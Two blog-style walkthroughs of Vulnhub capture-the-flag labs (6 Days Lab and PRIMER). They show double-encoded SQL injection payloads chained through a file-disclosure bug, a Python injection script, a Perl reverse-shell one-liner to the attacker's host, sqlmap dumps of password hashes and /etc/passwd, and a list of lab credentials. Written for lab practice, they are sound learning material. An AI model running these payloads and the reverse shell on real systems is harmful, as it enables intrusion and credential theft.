6 Days Lab 1.1 Vulnhub

Hello 😀

This is my walkthrough for 6Days Lab

Nmap
2016-08-04_18-41-11

Look at the web app…
2016-08-04_19-05-50

Look at the page source…
2016-08-04_19-05-50

Before I check the image.php, I want to try input something on the promocode form..
2016-08-04_18-53-08

I try to use sqlmap with tamper chardoubleencode option, but it’s not successful. I think because the ips, let’s find another way… Then I find local file disclosure vulnerability on this web app, this has happened because the target using readfile function on image.php for getting images from a file or other site.

2016-08-04_18-42-11

Stuck with this vulnerability for several hours… But after I try to look at the apache configuration on the server target and look at back to nmap result I have an idea for another attack.

2016-08-04_18-43-15

With the local file disclosure vulnerability we can take advantage for access port 8080 from the target. Then, if we look at the checkpromo.php this code has vulnerabilities (SQL injection). But because the IPs block all malicious code from external this SQL injection vulnerability cannot be exploited.

2016-08-04_18-45-39

Okay, let’s see if we do the injection from local target what that IPS still block all malicious requests or not??

Payload:

' union all select schema_name,null from information_schema.schemata#

Don’t forget to double encode your payload.
2016-08-04_19-01-34

Whoops… nice response from the target, but we should find the right payload for this injection. Look at back to the checkpromo.php code.
2016-08-04_19-01-34

On the checkpromo.php source code has stated if row “status” = 0 targets will be answered “Code expired!” then we can send a payload that is slightly different from the previous. Change “null” with number let’s say 1 or 2 or 3.

Payload:

' union all select schema_name,1 from information_schema.schemata#

2016-08-04_19-02-20

Okeh bro, I made a small code to perform the injection in order to more easily

#!/usr/bin/python
import urllib,urllib2

url = "http://192.168.1.103/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527%2520"
def encode(sqli):
	enc = urllib.quote_plus(sqli)
	doubleenc = urllib.quote_plus(enc)
	print "Request : " + url + doubleenc + "\n"
	request(doubleenc)
	
def request(doubleenc):
	request = urllib2.urlopen(url+doubleenc)
	response = request.read()
	print response
	request.close()

encode("union all select concat(username,':',password),1 from fancydb.users#")

2016-08-04_20-18-01

Yapp, we have credentials right now. As we know ssh open on the target and try to login ssh with user “andrea”
2016-08-04_20-23-59

Nice one we successful login, but there was a problem caused we got an escaping restricted shell.
2016-08-04_20-30-11

:):):):):):) but Offsec say Try Harder!

Easy way out from this escaping restricted shell, we can use python or perl or another language for reverse shell, in this case I use perl for reverse this shell.

Perl code:

perl -e 'use Socket;$i="192.168.1.140";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2016-08-04_20-37-08

We got a real shell now, in there has a dog binary but, I don’t have an idea to rooted this box using dog binary. I just check the kernel and OS version then exploit with “overlayfs” vulnerability.

2016-08-04_20-42-40

Local Exploit
2016-08-04_20-49-24

Flag
2016-08-04_20-50-45

Thank you vulnhub!

PRIMER 1.0.1 (SQL injection)

Mengisi waktu luang sore hari,

Lab PRIMER 1.0.1 – https://www.vulnhub.com/entry/primer-101,136/?override=1

Starting with nmap

root@kali:~# nmap -sC -sV 192.168.1.108

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-20 14:57 WIB
Nmap scan report for 192.168.1.108
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 01:2e:60:5f:99:48:3b:2f:c0:72:c6:ae:48:02:5e:33 (DSA)
|   2048 ed:26:be:cc:c6:2a:93:d1:e1:6d:0d:5a:53:7b:4d:fb (RSA)
|_  256 7f:4e:64:a0:c4:8a:13:8e:e9:86:3d:5d:49:04:c4:54 (ECDSA)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/4_8f14e45fceea167a5a36dedd4bea2543
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37649/tcp  status
|_  100024  1          47277/udp  status
MAC Address: 00:0C:29:0D:92:09 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds

 

Check port 80
2016-02-20_16-38-12Hmm let’s check another interesting page at :
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/4_8f14e45fceea167a5a36dedd4bea2543
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER

2016-02-20_16-39-35

click “EOF” button

2016-02-20_16-42-48

after open this page, you can watch my short video for get more interesting page

 

Stuck…….
try to check all urls that you already get

4_8f14e45fceea167a5a36dedd4bea2543
5_6512bd43d9caa6e02c990b0a82652dca
6_c51ce410c124a10e0db5e4b97fc2af39
7_70efdf2ec9b086079795c442636b55fb

this url seems like md5 encryption, let’s separate this urls and decrypt this md5.
watch my short video “again” for the next step 😀

and.. stuck “again” …
after several minutes, i still have no idea on this terminal at the web page, so i just back to the home page and try to exploit form login with sqlmap

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601180a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:05:10

[15:05:10] [INFO] testing connection to the target URL
[15:05:10] [INFO] searching for forms
[#1] form:
POST http://192.168.1.108:80/login.php
POST data: usr=&pw=&commit=Login
do you want to test this form? [Y/n/q] 
> 
Edit POST data [default: usr=&pw=&commit=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] n
[15:05:13] [INFO] using '/root/.sqlmap/output/results-02202016_0305pm.csv' as the CSV results file in multiple targets mode
sqlmap got a 302 redirect to 'http://192.168.1.108:80/index.html'. Do you want to follow? [Y/n] n

------------SNIP------------

[15:05:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[15:05:25] [INFO] POST parameter 'usr' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:05:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:05:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:05:28] [INFO] checking if the injection point on POST parameter 'usr' is a false positive
POST parameter 'usr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 95 HTTP(s) requests:
---
Parameter: usr (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: usr=' AND (SELECT * FROM (SELECT(SLEEP(5)))hAik) AND 'vdbv'='vdbv&pw=&commit=Login
---
do you want to exploit this SQL injection? [Y/n] 
[15:05:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[15:05:46] [INFO] fetching database names
[15:05:46] [INFO] fetching number of databases
[15:05:46] [INFO] retrieved: 
[15:05:46] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
5
[15:05:58] [INFO] retrieved: 
[15:06:03] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[15:07:14] [INFO] retrieved: mysql
[15:07:34] [INFO] retrieved: performance_schema
[15:08:44] [INFO] retrieved: phpmyadmin
[15:09:27] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[15:09:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0305pm.csv'

[*] shutting down at 15:09:44

current db is “test” but there is nothing interesting in this database, just try to dump mysql database to get password root mysql

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form -D mysql -T user -C User,Password --dump

----------SNIP---------

Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 |
| phpmyadmin       | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
+------------------+-------------------------------------------+

[19:13:31] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.1.108/dump/mysql/user-f3649c95.csv'
[19:13:31] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0713pm.csv'

[*] shutting down at 19:13:31

then decrypt root hash password, and whopss.. root password for mysql is “PRIMER”
2016-02-20_19-18-27

so what are the advantages that we can get from this password?
try to check the privilege we are database administrator or not, like usually if we can dump mysql database the privilege is “dba” then try to read file from the back-end

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form --threads=5 --file-read="/etc/passwd"

-----------SNIP-----------

[19:29:59] [INFO] the local file '/root/.sqlmap/output/192.168.1.108/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (1493 B)
files saved to [1]:
[*] /root/.sqlmap/output/192.168.1.108/files/_etc_passwd (same file)

[19:29:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0729pm.csv'

[*] shutting down at 19:29:59

Wohooo.. [*] /root/.sqlmap/output/192.168.1.108/files/_etc_passwd (same file) means that the file was successfully extracted

passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
nieve:x:1000:1000:nieve,,,:/home/nieve:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

there is an existing user on this machine, then try to login ssh service with user “nieve” and password “PRIMER”
2016-02-20_19-56-46
but wait… password “PRIMER” is root password for mysql, let’s to try to get root privilege with this password just try my luck
2016-02-20_20-03-46
BINGGOOO!!!
i don’t know this is the right way or not but this is my way i love my way :p

Appendix
MYSQL Credentials
root:PRIMER

User Machine Credentials
nieve:PRIMER
root:PRIMER

Terminal Web – passwod for connect to host
Erebus
falken:joshua1984
mccarthy:m4xw*311#

TrivialZ3r0
falken:Riemann

Wintermute
chaos:2.718281828459045

Zephis
nieve:08rf8h23

Thank you PRIMER and vulnhub!
lol